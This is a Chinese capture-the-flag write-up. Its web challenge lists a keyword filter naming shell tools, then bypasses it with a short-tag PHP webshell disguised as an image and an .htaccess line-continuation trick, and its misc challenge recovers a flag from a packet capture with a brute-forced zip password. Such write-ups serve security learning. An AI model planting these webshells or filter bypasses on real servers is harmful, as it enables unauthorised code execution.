Web_Check in

perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents!
当过滤内容ph,和>
上传的php图片木马用短文件绕过,
<?=system('ls');
上传的.htaccess可以这样写
AddType application/x-httpd-p\
hp .jpg
用.htaccess的''换行符,进行换行
抛开此题的auto过滤也可以使用.user.ini方式

Misc_大杂烩

分析流量包,过滤http(本题为图片,6张jpg,1张png)

过滤出http的包之后,调一下排序方式,就会更清楚的看到那几个有图片的数据,然后逐个提取

提取出的jpg图片都是无用的干扰信息。png图片里有一个链接

然后访问链接,是一个word文件。下载下来,binwalk -e 文件名 进行分离。由于附件是在谷歌云盘,所以需要挂梯子下载

分理出的文件夹打开会有一个zip的压缩包,拿出来爆破。或者在kali里面爆破也行。因为官方提示是6位数的密码,前两位是DE,并且说了这是个爆破题

爆破得出密码:DE34Q1

注意点:

1.这里的压缩包不要解压,解压出来flag的txt文件会消失
2.使用2345压缩工具flag也会消失

最后得到flag

这次比赛杂项题组中做出来的还有两道题(签到),需要科学上网